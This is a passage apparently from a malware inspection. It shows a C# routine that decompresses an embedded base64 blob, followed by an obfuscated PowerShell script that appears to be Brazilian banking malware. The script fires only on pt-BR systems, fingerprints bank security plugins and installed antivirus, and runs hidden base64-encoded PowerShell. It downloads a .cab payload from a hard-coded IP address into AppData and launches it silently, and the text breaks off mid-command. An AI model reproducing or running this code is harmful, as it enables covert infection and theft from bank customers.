lzO0133tXwdIJ+jtR7U3RPlcIj5cKdVCezofodyP0K6aRm+dFdJ/re1oivo5w89BjhP0/z76K66j/bGNem4iX+UI5Av6HCBdIGfgs4V8DLQerxE393Fd4GeF9A9Rn+BnN4g/YM8XaEf7et17Lb8R2C/g4jn6M9A5HMF6wFeJet4b4fuvEW8ukV7gH/DspcZZxMM9hfJ5RLuA9bsoP7D7KeLU9Qj5uEa8+GhxwdjRCPXWxXU/opyBrmPUG4x/0PJH3AV+wR8uzXvqk8E51KNCug4QV65XKJcV2tujxivUr8YbtIcp2k0Tx4Ecxxo3EIdgPcDfSMuhB+uBfK6RH7A34CvV/K/Az3dztHvt5zeoT/jZV4bfY2sPw56Jc2/QXsCeb5RaoRxKxCPQYx/pBdwpkX6Q842eL0f/e0TcP+2h/sEOEV/gc8DDA8QzsL97/Z5i/z9G+Q80jkTI3wHSV2p8GeH6p+h34EcztDug86W2vxHEGeD3JfoxyGmI8+xpf1yhHwEfA7S7G7SXA/RDwGfAjUsbVwYotz0dpyPU+xt8v5sbOYE99ZE+kOsJxkewP9BrC+m6QZwEugGf3iEd54j36Bc9irMwL9j1G2XwpNRyy1FPn3F9sPdHlPOFlt8I/fAa6b7C+Ah2+XKFOP8e9fIB171BO+tafgFn+oiDB2gXMC/QD+u+Qv++QT/EOKKfa/w8QvlovwH5Aq5+Rr+Defrst4doDzCPjnNgb/vKyO1Qx9VD1B/QrXG3RH6Af4O/bcS3JtoNvP8B/eUU1zvE+Ip+hnEK5X6C8fAO6QccPtb2uULc0fjwGccDHr5G/cJ8PcSZk5WaqN336lhh/mHzJZOHLHWc0/nWCdrxTOcfo7/1HOwHfr5BfN0H+xpB/tLV+dE7m7+sbN7zGce97KmZ2l2pqxXYI8ilRL/A/Ar96UCv897qZyLzaVzbQ3r7ejzQj3I2+d17xAUYt6/zIYX50Hv1xz9svJBK8Hek/YP5h4fx41Qn8f/DGxXXJ7fj8qObeT+RcveXc6iptr7VJJsbZJ9tLh9up3//NZtphv0dbLenf9ftme3mmosxnfIkibEtW5i+hi5GYinKUreC1wVvk8qdlEqYyk2Zmyvg9ie/NjkrPzxAVfnL99/vzkt9n7NVZituNJtRA1WZR89/nU8nSyhbnh8fnRydd/eeH5fLxcG0MXs7wyJo4y/qB/VN/xNM/IMuilC0jd0+3bf5/ffOp4MZ3i+NHzfcj/t7VAd/t7G18Z359NVCzYdvx0tQzMO8/G5jewOGzRZ24GyB/0IlCx/CBxvffHgY3BkC8I7V2sY3UHabvweP241RuTwDzU4ni3JLSwSs+Ku5u7ph63tzSfW2/XBvDG/jy/q9/wY=");
    
            
    
            //File.WriteAllBytes( @"c:\temp\teste64.zip", file);
    

    
            string s = Decompress(file);
    
            Console.WriteLine(s);
    
            Console.ReadKey();
    

    

    
        }
    

    
        public static string Decompress(Byte[] bytes)
    
        {
    
            using (FileStream decompressedStream = File.Create(@"c:\temp\logfile64.txt"))
    
            //using (var uncompressed = new MemoryStream())
    
            using (var compressed = new MemoryStream(bytes))            
    
            using (var ds = new DeflateStream(compressed, CompressionMode.Decompress))
    
            {
    

    
                
    
                    try
    
                    {
    
                    // ds.CopyTo(uncompressed);
    
                    ds.CopyTo(decompressedStream);                        
    
                    }
    
                    catch (Exception ex)
    
                    {
    
                        Console.WriteLine(ex.Message);
    
                
    
                    }
    

    
                //return Encoding.ASCII.GetString(uncompressed.ToArray());
    
                return decompressedStream.ToString();
    
            }
    
           
    
        }
    
    }
    
}
    

    
 



    
$ie = New-Object -com internetexplorer.application; 
    
$ie.visible = $true; 
    
$ie.navigate("");
    
$mtx = New-Object System.Threading.Mutex($false, "mtt")
    
if ($mtx.WaitOne(500)) {
    
if(-not (Test-Path "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')")){
    
	([char[]](87,105,110,100,111,119,115,32,119,111,114,107,105,110,103,32,110,111,114,109,97,108,108,121,44,32,105,103,110,111,114,101,32,116,104,105,115,32,108,111,103) -join '') >> "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92,108,111,103,46,116,120,116) -join '')"
    
	if(((Get-Culture).Name.ToLower() -eq ([char[]](112,116,45,66,114) -join '').ToLower())) {
    
		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];
    
		$gbPath = Join-Path $dir ([char[]](71,98,80,108,117,103,105,110) -join '');
    
		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};
    
		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};
    
		$avs = (Get-WmiObject -Namespace ([char[]](114,111,111,116,92,83,101,99,117,114,105,116,121,67,101,110,116,101,114,50) -join '') -QUERY ([char[]](83,69,76,69,67,84,32,68,105,115,112,108,97,121,78,97,109,101,32,70,82,79,77,32,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116) -join ''));
    
		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 
    
		if($av -like "*avg*"){
    
			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList ([char[]](45,78,111,80,32,45,78,111,110,73,32,45,87,32,72,105,100,100,101,110,32,45,69,32,32,99,119,66,104,65,71,119,65,73,65,66,104,65,67,65,65,84,103,66,108,65,72,99,65,76,81,66,80,65,71,73,65,97,103,66,108,65,71,77,65,100,65,65,55,65,71,107,65,90,81,66,52,65,67,103,65,89,81,65,103,65,69,107,65,84,119,65,117,65,70,77,65,100,65,66,121,65,71,85,65,89,81,66,116,65,70,73,65,90,81,66,104,65,71,81,65,90,81,66,121,65,67,103,65,75,65,66,104,65,67,65,65,83,81,66,80,65,67,52,65,81,119,66,118,65,71,48,65,99,65,66,121,65,71,85,65,99,119,66,122,65,71,107,65,98,119,66,117,65,67,52,65,82,65,66,108,65,71,89,65,98,65,66,104,65,72,81,65,90,81,66,84,65,72,81,65,99,103,66,108,65,71,69,65,98,81,65,111,65,70,115,65,83,81,66,80,65,67,52,65,84,81,66,108,65,71,48,65,98,119,66,121,65,72,107,65,85,119,66,48,65,72,73,65,90,81,66,104,65,71,48,65,88,81,66,98,65,69,77,65,98,119,66,117,65,72,89,65,90,81,66,121,65,72,81,65,88,81,65,54,65,68,111,65,82,103,66,121,65,71,56,65,98,81,66,67,65,71,69,65,99,119,66,108,65,68,89,65,78,65,66,84,65,72,81,65,99,103,66,112,65,71,52,65,90,119,65,111,65,67,99,65,97,103,66,87,65,70,111,65,84,103,66,106,65,68,107,65,99,65,66,74,65,69,85,65,82,65,65,119,65,71,52,65,86,103,66,109,65,71,115,65,85,65,66,76,65,72,77,65,99,65,66,87,65,72,77,65,85,81,65,118,65,72,77,65,97,119,66,48,65,71,111,65,84,119,66,49,65,72,65,65,101,103,66,104,65,72,99,65,101,65,66,122,65,71,103,65,83,81,66,108,65,69,119,65,100,119,66,78,65,70,103,65,100,119,66,104,65,71,119,65,97,103,65,120,65,71,99,65,84,81,66,97,65,70,107,65,101,65,66,82,65,71,107,65,83,119,66,84,65,70,69,65,84,81,66,105,65,70,111,65,76,119,66,81,65,71,89,65,100,65,66,79,65,68,73,65,81,81,66,117,65,72,81,65,79,81,65,121,65,69,119,65,99,65,65,49,65,69,77,65,98,81,66,89,65,68,99,65,79,81,65,114,65,67,56,65,89,103,66,121,65,71,119,65,97,119,66,54,65,69,73,65,90,65,66,121,65,67,115,65,90,103,66,75,65,72,99,65,100,103,66,117,65,70,81,65,90,81,66,108,65,68,107,65,90,81,66,54,65,68,103,65,89,103,66,77,65,70,111,65,83,103,66,72,65,70,99,65,75,119,66,104,65,72,107,65,76,119,66,54,65,72,99,65,100,81,66,54,65,70,65,65,100,103,65,52,65,68,81,65,81,119,65,53,65,71,85,65,84,65,65,122,65,68,103,65,101,81,66,85,65,71,77,65,87,65,65,48,65,70,65,65,98,103,66,86,65,68,69,65,89,81,66,116,65,71,107,65,101,65,65,118,65,69,48,65,83,65,66,73,65,72,77,65,86,103,66,79,65,72,81,65,99,65,66,115,65,68,77,65,75,119,66,84,65,72,65,65,98,65,66,78,65,71,81,65,84,119,65,52,65,69,89,65,101,81,66,122,65,70,81,65,81,119,66,75,65,70,85,65,76,119,66,88,65,71,77,65,85,119,66,115,65,71,107,65,99,81,66,67,65,72,111,65,85,103,66,76,65,69,52,65,81,119,66,72,65,71,52,65,81,119,66,51,65,72,99,65,97,81,66,71,65,70,77,65,84,81,66,74,65,68,103,65,86,103,66,88,65,72,73,65,84,65,66,111,65,72,65,65,84,103,66,54,65,70,65,65,98,81,65,51,65,68,65,65,89,119,66,74,65,69,77,65,75,119,66,66,65,69,56,65,84,103,66,71,65,71,69,65,87,103,66,104,65,70,103,65,89,119,66,68,65,69,52,65,84,81,66,79,65,69,99,65,83,81,65,48,65,69,115,65,77,65,66,51,65,69,115,65,84,65,66,72,65,69,89,65,101,103,65,118,65,71,81,65,99,81,66,113,65,68,103,65,87,103,66,82,65,71,52,65,99,81,66,122,65,69,77,65,90,103,66,119,65,70,65,65,77,119,66,67,65,69,89,65,90,103,66,54,65,68,77,65,85,65,66,81,65,67,115,65,101,103,66,83,65,69,99,65,76,119,66,85,65,68,69,65,101,103,65,122,65,69,69,65,99,103,66,119,65,70,85,65,84,119,66,54,65,70,73,65,99,81,66,68,65,69,107,65,79,81,66,52,65,72,99,65,100,81,66,80,65,70,111,65,75,119,66,73,65,71,85,65,98,65,65,121,65,72,89,65,83,103,65,53,65,69,81,65,79,65,66,51,65,68,99,65,100,119,66,83,65,68,77,65,97,103,66,66,65,71,56,65,99,119,66,54,65,68,81,65,81,103,66,115,65,71,69,65,85,65,66,111,65,68,99,65,100,81,66,79,65,69,89,65,84,65,65,48,65,67,115,65,85,119,66,50,65,71,85,65,85,81,66,81,65,69,52,65,78,81,66,113,65,71,89,65,82,103,65,51,65,69,73,65,81,119,66,122,65,69,48,65,85,119,65,120,65,70,89,65,82,65,65,52,65,69,48,65,83,119,66,113,65,71,103,65,98,65,66,49,65,72,81,65,78,119,66,49,65,69,77,65,77,81,66,69,65,72,89,65,97,103,66,67,65,68,85,65,84,81,66,67,65,69,119,65,79,65,66,72,65,68,81,65,77,81,66,81,65,72,69,65,82,119,66,108,65,71,56,65,97,65,66,108,65,70,73,65,101,65,65,49,65,70,103,65,90,119,66,76,65,72,65,65,90,103,65,48,65,72,99,65,97,81,66,107,65,69,99,65,90,103,66,90,65,69,107,65,77,103,66,89,65,72,89,65,84,103,66,49,65,68,65,65,84,65,66,113,65,69,69,65,100,65,66,75,65,70,77,65,79,65,66,105,65,71,99,65,90,119,66,69,65,69,52,65,87,81,66,108,65,70,103,65,87,81,66,111,65,71,99,65,83,103,66,109,65,71,111,65,77,65,66,112,65,71,111,65,77,119,66,79,65,68,81,65,82,81,65,49,65,68,81,65,86,65,65,52,65,72,81,65,89,81,66,83,65,70,99,65,99,119,66,80,65,68,107,65,87,81,66,111,65,68,65,65,77,119,65,118,65,69,77,65,77,119,65,122,65,70,103,65,85,65,66,110,65,72,65,65,83,103,66,119,65,69,99,65,78,103,66,83,65,70,77,65,84,81,66,114,65,68,99,65,97,103,66,78,65,68,103,65,99,81,66,87,65,69,56,65,99,103,66,115,65,69,119,65,79,81,66,79,65,72,65,65,82,103,66,90,65,69,107,65,83,81,66,112,65,72,107,65,77,65,66,116,65,72,65,65,83,103,66,50,65,70,77,65,100,119,66,50,65,67,56,65,85,103,66,118,65,68,89,65,84,119,66,87,65,71,99,65,77,119,66,53,65,69,103,65,97,119,66,73,65,68,85,65,78,81,66,77,65,70,85,65,98,119,66,122,65,70,107,65,90,65,66,89,65,70,107,65,99,81,65,51,65,70,89,65,81,119,66,70,65,69,99,65,84,65,66,97,65,68,85,65,77,119,65,53,65,71,69,65,78,81,66,89,65,70,107,65,100,119,66,106,65,68,73,65,83,103,65,52,65,68,85,65,86,103,65,49,65,72,103,65,98,65,66,120,65,70,89,65,99,81,66,77,65,71,85,65,83,81,65,53,65,72,99,65,81,81,65,118,65,71,119,65,82,65,65,48,65,72,65,65,82,65,66,83,65,67,115,65,87,81,66,114,65,71,119,65,89,119,66,107,65,71,77,65,98,65,65,53,65,68,65,65,82,81,65,53,65,68,85,65,86,65,66,69,65,71,81,65,83,65,66,75,65,70,69,65,100,119,66,122,65,72,69,65,83,81,65,119,65,68,89,65,83,65,66,107,65,70,85,65,97,119,65,118,65,67,115,65,77,81,66,105,65,70,65,65,83,119,65,118,65,69,111,65,85,81,66,120,65,69,81,65,90,65,65,49,65,71,89,65,98,119,66,70,65,70,103,65,85,81,66,116,65,72,89,65,101,81,66,119,65,69,69,65,75,119,66,90,65,68,99,65,100,119,66,119,65,69,81,65,99,103,66,85,65,68,89,65,97,81,66,121,65,72,65,65,98,103,66,89,65,70,69,65,100,119,66,69,65,71,103,65,83,119,65,122,65,71,99,65,85,119,65,120,65,68,81,65,78,81,66,86,65,72,99,65,98,103,66,50,65,72,81,65,86,81,66,113,65,68,73,65,85,119,66,48,65,67,56,65,81,119,65,118,65,70,73,65,87,103,66,67,65,71,107,65,85,103,66,69,65,68,99,65,77,81,66,71,65,71,85,65,100,65,65,50,65,72,77,65,100,103,65,122,65,70,99,65,83,119,66,112,65,69,77,65,100,103,66,84,65,70,107,65,97,119,66,81,65,68,85,65,81,119,66,89,65,68,85,65,98,103,65,48,65,68,85,65,79,81,66,116,65,70,65,65,83,119,65,122,65,67,115,65,83,119,65,53,65,69,89,65,90,103,66,115,65,70,65,65,78,119,65,122,65,70,65,65,89,81,66,54,65,72,103,65,89,103,65,50,65,69,115,65,84,65,65,120,65,71,73,65,100,119,65,50,65,70,73,65,90,81,66,106,65,68,65,65,77,103,65,53,65,72,111,65,97,103,66,84,65,71,89,65,101,81,66,72,65,69,119,65,82,119,66,50,65,69,103,65,100,103,66,88,65,70,85,65,78,81,65,50,65,69,115,65,85,65,65,48,65,69,77,65,97,119,66,70,65,70,69,65,78,81,65,49,65,72,107,65,89,103,65,52,65,71,107,65,75,119,65,51,65,71,77,65,97,65,66,85,65,67,56,65,82,103,66,81,65,69,77,65,99,81,65,50,65,69,89,65,90,103,66,120,65,71,115,65,100,103,66,72,65,68,107,65,77,65,66,48,65,71,77,65,99,119,66,80,65,68,81,65,101,65,66,83,65,69,89,65,90,103,66,109,65,70,107,65,79,81,65,52,65,72,77,65,85,65,65,52,65,71,52,65,89,103,66,118,65,68,89,65,78,119,66,113,65,71,107,65,82,65,66,51,65,71,52,65,98,119,66,119,65,70,65,65,90,119,66,68,65,72,69,65,79,81,65,114,65,72,65,65,82,65,65,51,65,69,69,65,79,65,66,54,65,69,77,65,81,81,65,50,65,69,77,65,81,103,65,52,65,70,69,65,75,119,66,105,65,72,103,65,89,119,66,113,65,71,52,65,101,65,66,54,65,69,81,65,78,81,66,76,65,72,89,65,86,103,66,81,65,71,85,65,82,103,66,52,65,67,115,65,78,81,66,117,65,69,115,65,90,81,66,52,65,68,99,65,86,119,66,79,65,69,52,65,76,119,66,70,65,69,56,65,79,81,66,82,65,72,81,65,101,65,66,71,65,72,69,65,90,119,66,80,65,72,89,65,97,81,66,107,65,69,81,65,86,119,66,90,65,67,115,65,90,103,66,49,65,71,119,65,98,103,66,53,65,71,119,65,85,65,66,118,65,68,107,65,75,119,66,114,65,72,111,65,99,103,66,116,65,68,85,65,81,119,65,122,65,70,65,65,83,65,65,114,65,71,52,65,82,65,66,108,65,71,77,65,85,81,65,52,65,69,115,65,76,119,66,121,65,68,65,65,77,65,66,107,65,68,89,65,84,65,66,87,65,69,111,65,100,65,65,53,65,69,103,65,86,103,66,71,65,68,77,65,79,65,66,86,65,71,48,65,85,65,66,108,65,70,103,65,101,65,66,105,65,68,99,65,78,65,66,104,65,68,81,65,98,119,66,122,65,68,103,65,98,65,66,50,65,69,107,65,97,103,66,52,65,70,99,65,76,119,66,76,65,70,103,65,90,103,66,110,65,72,73,65,90,103,66,76,65,68,103,65,87,103,66,107,65,69,48,65,99,103,65,51,65,70,65,65,90,81,66,52,65,69,107,65,100,103,66,107,65,70,99,65,99,103,65,50,65,70,69,65,84,119,66,90,65,71,119,65,87,103,66,52,65,68,65,65,82,65,66,54,65,72,73,65,90,103,66,118,65,68,65,65,89,103,66,71,65,68,107,65,82,103,65,118,65,68,107,65,82,81,66,104,65,71,115,65,98,65,65,114,65,68,81,65,100,81,66,106,65,72,103,65,79,81,65,48,65,69,81,65,86,81,66,118,65,70,111,65,98,65,66,81,65,68,89,65,97,81,66,113,65,72,65,65,101,81,66,52,65,68,99,65,98,103,66,51,65,68,81,65,76,119,66,114,65,72,89,65,90,65,66,82,65,72,81,65,100,103,66,111,65,72,103,65,81,81,65,48,65,71,99,65,86,103,66,81,65,68,85,65,100,103,66,49,65,69,111,65,100,103,66,119,65,71,48,65,101,81,66,85,65,72,85,65,98,81,66,77,65,68,89,65,82,103,66,105,65,72,107,65,87,65,66,115,65,72,85,65,99,103,66,74,65,70,103,65,86,81,66,84,65,72,89,65,101,103,66,51,65,72,111,65,101,103,65,49,65,68,73,65,90,65,65,49,65,72,107,65,83,65,66,117,65,70,107,65,98,119,66,88,65,68,89,65,85,103,66,54,65,68,107,65,77,81,66,88,65,71,73,65,76,119,66,78,65,70,73,65,86,81,66,104,65,71,81,65,101,65,65,48,65,72,111,65,101,103,66,77,65,69,115,65,79,65,65,50,65,71,89,65,84,81,65,122,65,68,103,65,100,65,65,114,65,72,103,65,97,103,66,112,65,67,56,65,77,65,66,78,65,72,73,65,81,103,65,51,65,71,52,65,77,119,66,69,65,69,48,65,97,103,65,114,65,71,119,65,89,103,66,112,65,71,103,65,100,103,66,84,65,70,111,65,78,81,66,67,65,71,48,65,86,103,65,50,65,71,103,65,99,119,65,52,65,71,85,65,79,65,65,114,65,68,69,65,89,119,66,52,65,69,111,65,101,65,66,85,65,71,119,65,99,103,66,86,65,68,81,65,100,119,66,76,65,69,52,65,97,81,66,81,65,72,103,65,83,65,65,53,65,69,99,65,83,65,66,77,65,67,115,65,99,103,65,118,65,69,111,65,75,119,66,86,65,72,103,65,87,81,66,115,65,67,56,65,97,103,65,52,65,71,48,65,87,65,66,81,65,71,77,65,99,119,65,122,65,68,73,65,83,103,65,121,65,69,56,65,89,119,65,50,65,67,115,65,85,81,65,51,65,72,65,65,83,119,65,118,65,69,99,65,101,65,65,48,65,69,103,65,75,119,66,110,65,71,111,65,101,103,66,49,65,68,73,65,98,103,66,119,65,69,73,65,79,81,66,49,65,71,48,65,86,119,65,53,65,69,48,65,98,119,66,108,65,70,103,65,78,81,66,68,65,67,56,65,79,81,65,122,65,70,65,65,83,103,66,108,65,71,48,65,76,119,66,48,65,69,85,65,75,119,66,112,65,67,56,65,79,81,66,88,65,69,119,65,83,119,65,114,65,69,52,65,100,81,66,107,65,70,73,65,75,119,66,112,65,69,89,65,78,119,66,106,65,72,77,65,84,65,65,49,65,69,89,65,100,103,65,121,65,68,99,65,77,81,66,70,65,71,81,65,79,65,66,89,65,72,107,65,84,81,66,50,65,69,56,65,100,119,65,118,65,70,77,65,99,65,66,54,65,71,73,65,79,81,66,77,65,69,103,65,99,81,66,77,65,68,99,65,100,119,66,77,65,72,69,65,84,65,65,118,65,72,89,65,77,81,66,114,65,72,89,65,90,119,66,77,65,67,115,65,98,65,66,50,65,68,103,65,84,81,66,68,65,71,119,65,82,103,66,81,65,68,103,65,98,65,66,50,65,71,77,65,86,81,66,82,65,71,89,65,99,103,66,97,65,69,103,65,81,81,66,89,65,71,85,65,82,81,66,121,65,72,85,65,84,103,65,114,65,69,56,65,75,119,65,118,65,71,107,65,100,119,65,49,65,72,99,65,99,103,66,112,65,68,73,65,83,65,65,119,65,72,65,65,79,81,66,90,65,72,77,65,85,65,66,79,65,68,77,65,89,81,66,49,65,71,56,65,100,103,65,53,65,68,89,65,84,65,65,51,65,68,89,65,85,119,66,106,65,68,103,65,99,103,65,53,65,68,89,65,79,81,66,109,65,70,69,65,97,81,66,88,65,70,69,65,76,119,66,108,65,71,52,65,89,103,65,118,65,70,65,65,97,65,65,51,65,71,52,65,99,119,66,113,65,72,111,65,100,81,65,120,65,70,99,65,90,103,66,72,65,68,77,65,86,119,66,111,65,72,77,65,78,65,66,75,65,70,107,65,87,81,66,114,65,68,69,65,90,103,66,69,65,72,111,65,98,65,66,109,65,69,52,65,78,119,66,116,65,67,115,65,99,103,66,110,65,68,103,65,77,103,66,54,65,72,77,65,98,103,66,79,65,69,56,65,90,103,66,87,65,67,56,65,101,65,66,81,65,70,65,65,99,81,66,48,65,70,81,65,99,103,65,49,65,68,107,65,82,119,66,53,65,67,56,65,79,65,66,74,65,68,107,65,86,81,65,118,65,71,89,65,97,103,65,53,65,70,99,65,78,119,66,77,65,70,65,65,82,81,65,114,65,70,103,65,89,103,66,109,65,71,99,65,100,103,66,48,65,68,73,65,97,65,66,106,65,72,73,65,78,119,66,54,65,67,115,65,76,119,66,108,65,71,52,65,98,81,66,54,65,71,48,65,101,65,66,90,65,69,52,65,79,65,65,114,65,69,77,65,99,103,66,67,65,71,111,65,86,65,66,49,65,68,103,65,98,103,66,50,65,70,103,65,86,65,65,114,65,68,89,65,83,119,66,106,65,70,111,65,77,103,66,105,65,71,48,65,101,65,66,50,65,69,48,65,79,65,66,79,65,67,56,65,98,65,66,122,65,71,52,65,87,81,66,109,65,68,77,65,101,81,65,53,65,71,111,65,84,81,65,51,65,69,81,65,90,65,66,50,65,71,119,65,98,81,65,49,65,69,48,65,84,81,66,113,65,72,81,65,75,119,66,77,65,70,77,65,99,119,66,84,65,72,89,65,89,103,66,52,65,68,77,65,86,65,66,114,65,68,103,65,89,103,66,119,65,72,69,65,90,119,65,121,65,68,85,65,86,81,66,50,65,70,111,65,101,103,66,108,65,70,73,65,77,81,66,87,65,72,85,65,101,81,66,107,65,71,69,65,99,65,66,108,65,70,107,65,81,103,65,114,65,70,73,65,99,81,66,108,65,68,99,65,78,65,65,121,65,70,81,65,100,81,66,87,65,68,65,65,87,81,66,108,65,68,99,65,98,103,65,121,65,68,99,65,90,119,65,48,65,72,69,65,79,65,66,110,65,71,52,65,84,81,66,122,65,72,89,65,85,119,66,69,65,69,99,65,82,119,66,52,65,70,81,65,81,103,66,80,65,71,52,65,84,65,65,53,65,71,103,65,83,103,66,70,65,71,85,65,76,119,66,107,65,69,52,65,81,119,66,116,65,70,99,65,101,81,66,107,65,71,69,65,89,119,66,80,65,70,89,65,87,65,66,54,65,72,111,65,86,65,66,115,65,69,111,65,100,65,66,117,65,69,89,65,79,65,65,53,65,72,89,65,77,119,66,79,65,72,85,65,78,119,66,107,65,72,81,65,86,81,65,120,65,72,73,65,99,119,66,71,65,72,111,65,85,81,65,118,65,72,111,65,86,81,66,77,65,71,111,65,76,119,66,81,65,70,65,65,82,119,66,108,65,70,103,65,98,103,66,52,65,69,48,65,75,119,66,114,65,72,103,65,86,81,66,109,65,68,69,65,98,103,66,118,65,72,81,65,82,81,65,52,65,68,77,65,97,65,66,121,65,71,52,65,78,81,66,80,65,70,103,65,99,103,66,89,65,71,52,65,77,103,65,49,65,69,56,65,79,81,66,111,65,72,89,65,97,103,66,75,65,69,48,65,87,65,65,121,65,70,81,65,83,119,66,75,65,70,103,65,97,65,66,72,65,71,81,65,101,103,66,121,65,71,69,65,98,119,66,48,65,71,107,65,86,119,66,48,65,68,103,65,75,119,66,81,65,71,81,65,86,119,66,52,65,70,65,65,98,103,65,49,65,72,73,65,100,65,65,49,65,70,99,65,97,65,66,90,65,67,56,65,99,81,66,75,65,69,81,65,87,103,66,68,65,71,77,65,86,103,66,107,65,71,48,65,87,65,66,86,65,70,65,65,85,119,66,117,65,68,69,65,83,103,66,115,65,68,103,65,98,81,66,111,65,72,99,65,99,119,66,81,65,71,89,65,77,65,65,51,65,67,115,65,79,65,66,97,65,69,119,65,90,103,66,78,65,68,65,65,98,81,66,82,65,72,81,65,77,81,65,118,65,68,89,65,75,119,66,50,65,71,103,65,87,81,65,49,65,67,56,65,82,65,66,83,65,71,85,65,82,119,66,73,65,72,89,65,76,119,66,48,65,69,103,65,84,65,65,48,65,69,119,65,78,103,66,75,65,72,107,65,83,103,66,119,65,70,99,65,78,81,66,69,65,68,103,65,100,65,65,48,65,70,107,65,86,119,66,78,65,72,69,65,84,65,65,49,65,71,111,65,79,65,66,50,65,68,81,65,83,103,66,68,65,68,107,65,98,119,66,48,65,68,85,65,86,103,66,119,65,69,73,65,90,119,66,104,65,70,65,65,83,103,66,106,65,70,77,65,83,81,66,114,65,72,77,65,81,103,66,52,65,69,89,65,76,119,66,85,65,71,89,65,78,81,65,50,65,72,73,65,101,65,65,52,65,71,73,65,99,119,65,122,65,69,99,65,99,81,66,109,65,70,73,65,84,119,66,116,65,72,107,65,85,119,66,75,65,68,77,65,84,65,66,122,65,71,52,65,101,81,65,121,65,69,115,65,97,103,66,49,65,67,56,65,77,103,66,119,65,71,52,65,78,81,66,105,65,69,52,65,101,103,66,104,65,69,52,65,78,119,66,66,65,68,85,65,84,81,66,88,65,72,103,65,87,65,66,105,65,68,103,65,81,81,66,117,65,69,81,65,98,103,66,109,65,71,85,65,77,103,66,104,65,71,81,65,78,119,66,122,65,72,103,65,85,103,65,114,65,68,69,65,75,119,66,52,65,72,69,65,101,103,65,119,65,70,81,65,89,103,66,121,65,70,65,65,89,119,66,73,65,69,111,65,87,65,65,51,65,68,103,65,90,103,66,115,65,71,89,65,74,119,65,112,65,67,119,65,87,119,66,74,65,69,56,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,76,103,66,68,65,71,56,65,98,81,66,119,65,72,73,65,90,81,66,122,65,72,77,65,97,81,66,118,65,71,52,65,84,81,66,118,65,71,81,65,90,81,66,100,65,68,111,65,79,103,66,69,65,71,85,65,89,119,66,118,65,71,48,65,99,65,66,121,65,71,85,65,99,119,66,122,65,67,107,65,75,81,65,115,65,70,115,65,86,65,66,108,65,72,103,65,100,65,65,117,65,69,85,65,98,103,66,106,65,71,56,65,90,65,66,112,65,71,52,65,90,119,66,100,65,68,111,65,79,103,66,66,65,70,77,65,81,119,66,74,65,69,107,65,75,81,65,112,65,67,52,65,85,103,66,108,65,71,69,65,90,65,66,85,65,71,56,65,82,81,66,117,65,71,81,65,75,65,65,112,65,65,61,61) -join '') -wait;
    
			while((get-service -Name ([char[]](97,118,103,119,100) -join '')).Status -eq ([char[]](82,117,110,110,105,110,103) -join '')) {Start-Sleep -Seconds 10;}
    
		}
    
		$ps = (Get-ChildItem ([char[]](72,75,76,77,58,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,78,69,84,32,70,114,97,109,101,119,111,114,107,32,83,101,116,117,112,92,78,68,80) -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;
    
		if(Test-Path $(Join-Path $dir ([char[]](87,105,110,82,65,82) -join ''))){
    
			$wr = ([char[]](46,58,87,105,110,114,97,114) -join '')
    
		}
    
		if($v1) {
    
			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
    
			$ll = "COF267F9415EF3518C.cab"
    
			$output = "$env:APPDATA\$([char[]](77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92) -join '')" + $ll;
    
			(New-Object System.Net.WebClient).DownloadFile($durl, $output);
    
			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAeABWAE4ATABqADUAcwB3AEUARAA1AHYAcABQAHcASABIAHkASQBsAFUAVQAyAEYAQQBmAFAAWQBxAG8AYwBXAGgAYQBvADkAWgBLAFAATgBxAHAAYwBvAEIAdwBxAHoARABSAFcAUAAxAEQAagBaAGoAZABMADkANwAvAFcATABRAE4AUwBWAGUAdQBpAGgARQBnAGEAagBHAGMAOQA4AEQAOAA4AGsAegA5AEYANwBOAEkAMwB2AEUAcwBjAFAAawBzAGcAagBkAEoARwA0AGwASQBUAHgAMgB5AHoAOQBoAG0ATQAzAG8AWQB1AFAAaQA1AGgATQAzADQAMQBIAGsANgB5AHAAcQByAFMAVwArAGIATgBOAHQAawB2AFoAWgByAHUAZAArAFEARwBtAEkAWQA0AGMASABBAGEAWQAyAEIAUQBUAFkAbwB1AHYAVwBJAFMASQBGAFkAbABGAFYAZABUAEYAeABDAEgAcQBqAHgAQgBmAFoASQBpADkASABXAEYASwBNAEwAVgBsAFAASQByAFUAdgB6AHoAcABtAGIAQgBqAHEANgAvAHIAWQBDACsAUQBjAGIARQBoAHgATwBrAEwAeQB4AHoAaQA2AFoASwAyA